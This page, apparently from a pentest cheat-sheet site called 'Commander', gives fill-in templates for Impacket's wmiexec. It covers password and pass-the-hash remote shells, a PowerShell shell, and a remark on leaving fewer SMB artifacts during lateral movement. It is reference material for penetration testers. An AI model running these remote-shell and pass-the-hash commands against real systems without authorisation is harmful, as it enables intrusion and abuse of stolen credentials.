Commander

Copy-ready command templates for common penetration testing tools. Select a tool, fill in the parameters, copy, paste, profit.

impacket-wmiexec

↗ docs

Impacket's wmiexec — semi-interactive remote shell on Windows via WMI (leaves fewer SMB artifacts than psexec)

wmiwindowsremote-executionlateral-movementimpacket

Interactive Shell (Password)

Get a shell via WMI using password authentication.

impacket-wmiexec /:@

Interactive Shell (Pass-the-Hash)

Get a shell using NTLM hash instead of password.

impacket-wmiexec /@ -hashes :

PowerShell Shell

Get a WMI shell using PowerShell instead of cmd.

impacket-wmiexec /:@ -shell-type powershell